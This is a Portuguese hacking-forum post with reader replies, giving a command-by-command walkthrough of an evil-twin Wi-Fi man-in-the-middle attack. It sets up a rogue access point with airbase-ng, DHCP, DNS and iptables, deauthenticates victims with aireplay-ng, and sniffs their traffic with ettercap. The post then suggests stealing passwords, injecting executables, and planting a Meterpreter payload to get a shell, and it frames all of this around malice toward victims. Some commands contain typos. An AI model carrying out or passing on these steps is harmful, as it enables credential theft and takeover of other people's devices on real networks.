Man-In-The-Middle na prática
autor: FZERO
@sleeperthree~# otimo conteudo e alem de ser muito relevante, o kra escreve com uma claresa muito boa, RECOMENDO!
[..] Muita gente pensa que MITM(Homem-do-meio) é apenas usar o Ettercap e já virou hacker, outros até, pensam que ataques deste tipo não servem de nada.
Infelizmente, esta é a realidade de muitas pessoas que são pseudo-hackers ou até mesmo pseudo-elites.
Vamos lá, um ataque de MITM é quando o hacker se torna um relay entre dois, ou mais, clientes, neste caso, um Acess Point Wireless. Em essência, o hacker se torna um 'tracehop', que é um hop(ponto de passagem, nó).
Ataques MITM são muito usados para Phising, Spoofing e Sniffing. A única desvantagem desta técnica, é que dependendo do modelo OSI, você precisará ter acesso físico ao Acess Point.
Os meios para se explorar clientes usando a técnica do MITM são limitados a dois fatores: sua imaginação e a quantidade de maldade em seu coração. A boa notícia é: pode-se fazer muita pouca coisa se você não tiver maldade na cabeça.
Bom, vamos ao ataque, para executá-lo, você precisará de algumas ferramentas. Existem apenas poucas ferramentas que são realmente essênciais para fazer um MITM, mas para explorá-lo com eficiência, você precisará de muito mais, programar exploits também é bom :)
A base de um ataque MITM é pelos seguintes programas: airbase-ng(Incluido no aircrack-ng), bind9 e dhcp3-server.
Você pode usar também o Nessus, nmap, wireshark, ettercap, thc-hydra, metasploit, NetworkMiner, wine, cowpatty, nikto e vários outros.
Você também precisará de duas interfaces de rede, uma de entrada e uma de saída. Assegure-se que elas precisam ter suporte a 'modo monitor'. As suas vítimas precisam apenas estar rodando algum cliente wireless :)
Lembrando sempre que para executar estes passos que estou passando-lhes, você precisa estar rodando um console BASH e no meu caso as interfaces de rede wireless são eth0 e eth1 para não se confundirem.
Você precisa configurar um gateway totalmente funcional apenas uma vez, para isso, entre no arquivo de configuração do seu dhcp, o qual é /etc/default/dhcp3-server, agora, encontre a seguinte linha:
...
INTERFACES=
E coloque a interface que será o seu Acess Point, neste caso, será eth1, salve e saia.
Agora, abra o arquivo /etc/dhcp3/dhcpd.conf e insira as seguintes linhas:
ddns-update-style none;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.250;
option domain-name-servers 10.0.0.1;
option routers 10.0.0.1;
default-lease-time 600;
max-lease-time 7200;
}
Isso fará com que todo mundo que se conectar a você, será colocado na faixa de sub-rede entre 10.0.0.100 e 10.0.0.249. Tendo em mente que você é o 10.0.0.1, e que você tem um servidor DNS em seu computador. O que você terá. Agora, reinicialize o dhcp3-server com o seguinte comando:
sudo /etc/init.d/dhcp3-server restart
Se você quer ser um elite, você pode colocar uma conexão de loopback que você pode usar para rodar exploits sem precisa de uma outra máquina, abra o arquivo /etc/network/interfaces, DEPOIS DE TER CERTEZA DE QUE TEM UM BACKUP DELE. Adicione as linhas:
auto lo eth1
iface eth1 inet dhcp
iface lo inet loopback
E rode o comando: sudo /etc/init.d/networking restart
Agora que você tem um servidor DHCP, você precisa ligar e rodar o seu servidor DNS, para isso, usaremos o Bind9.
O Bind9 já vem configurado, então você apenas precisará modificá-lo para seus próprios sites, não farei isto agora para encurtar o post :)
Agora, execute o comando
/etc/init.d/bind9 stop
E abra o arquivo /etc/bind/named.conf.options, descomente as linhas a seguir e adicione servidores DNS alternativos, eu uso os do Google, o meu arquivo está assim:
options {
directory "/var/cache/bind";
fowarders { 8.8.8.8;8.8.8.4};
auth-nxdomain no;
listen-on-v6{ any; };
};
Agora, ligue o Bind9 de novo com o comando:
/etc/init.d/bind9 start
Neste momento, estamos prontos para executar o ataque ;)
Primeiro de tudo, conecte-se à internet usando a interface eth0, você provavelmente usará o servidor de acesso mais próximo, então, rode os seguintes comando para dar um kill em algumas coisas que podem causar conflitos, e dar poder sobre a interface de Acess Point(eth1):
kill `cat /var/run/dhcp.pid`
killall -9 dhcp3-server dhcpd wireshark ettercap airbase-ng
airmon-ng stop eth1
ifconfig eth1 down
modprobe tun
airbase-ng -e "ESSID" -P -C 30 -v eth1
O "ESSID" é o da rede a qual você está atacando. O parâmetro "-P" faz com que o Acess Point responda à todas as requisições e pedidos, capturando usuários bem mais rápido. O "-C 30" irá mudar os seus pacotes de resposta para enganar usuários, eles entrarão na rede mesmo se o SSID estiver incorreto.
Tenha certeza de que os comandos acima foram executados com sucesso para prosseguir.
Agora, você precisa configurar o seu iptables para o seu Acess Point, perceba que a interface at0 é muito fácil de ser colocado um sniffer junto, tudo o que você precisa fazer é executar os comandos a seguir o mais rápido o possível, para terminar de executá-los antes que muitos clientes tentem se conectar à rede, sugiro que você crie um script em Shell para isso :
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptavles -t nat -A POSTROUTING -o eth0 -j MASQUERADE
ettercap -T -q -p -i at0
Agora você tem um Acess Point totamente funcional, junto de um Sniffer embutido(se você tiver o ettercap instalado, é claro). Você perceberá que não tem muitos clientes se conectando, agora vem a parte divertida :)
Executaremos um ataque de Deauth(Desautenticação). Use o airodump-ng ou o ksmet para encontrar clientes e conseguir informações dos mesmos, com estas informações em mãos, execute o Deauth:
aireplay-ng -e "ESSID-ALVO" -a "MAC-DO-Acess-Point-ALVO" -c "MAC-Do-cliente-ALVO" --deauth 1 eth3
Se tudo correr bem, você poderá executar o comando a seguir para ver os clientes estão relativamente inativos. Se acontecer de ninguém re-entrar na rede logo em seguida, então eles possuem uma boa rede, e você precisará abusar um pouco da sua engenharia social para conseguir que eles se reconectem à rede. Espero que você tenha um ótimo "plano B" e inteligênicia e técnica o suficiente para isso.
Este é o comando para ver os clientes:
echo > '/var/state/dhcp/dhcpd.leases'
ou
sudo dhclient
Se tudo correu bem até aqui, então você está em uma posição perfeita para 'brincar' com os clientes ;)
Agora vai da sua imaginação, você pode usar um sniffer para capturar senhas, por exemplo o Wireshark ou Ettercap, usando filtros específicos, lembrem-se sempre que você precisará 'sniffar' a interface at0.
Usando o Network Miner, vocês podem até mesmo recriar a maioria dos arquivos que as pessoas baixam.
Você pode colocar executáveis em seus clientes, usando o Network Miner ou algum filtro do Ettercap, ou até mesmo copiando e colando nas pastas compartilhadas do windows ou até mesmo algum exploit de Iframe :)
Colocando e executando alguma payload já compilada, o Meterpreter por exemlpo, você terá acesso a uma Shell em seu cliente.
"O resto nasce daí"
Simples assim ;)
Este é um exemplo muito claro e real de um ataque de MITM, é claro, isto é apenas o básico, como já disse no começo do post, existem infinitas possibilidades de execuções ou ataques, agora que você já sabe como fazer, basta apenas ter imaginação :P
Metade do seu texto está faltando =/
Essa porra de ter mais de um layout quebra as pernas ....
¬¬'
@kest
pelo que entendi você não usa o tema padrão do darkers...
então acho que o problema é seu! kkk
vlw por postar, pelo visto vc gostou mesmo :)
realmente está muito bem escrito, muito bom!
Legal.
Queria apresentar o voces o MetaSploit que originou uma porção do ataque ao Google na Operação Aurora.
http://www.youtube.com/watch?v=53Yv-xAdstc
Com o qual é possível explorar uma vulnerabilidade no IE6 e IE7, é importante se queremos alterar algumas configurações para direcionar o trafego de alguma maquina cobaia para nosso Servidor Proxy que interceptaria um trafego a fim de estudo.
Outra opção interessante que pode ser aplicada em alguns ambientes com equipamentos Wireless antigos, é atraves de algumas ferramentas que não sejam detectadas por quem encaminha o trafego.
http://www.youtube.com/watch?v=N86xJpna9Js
Good Luck Magos!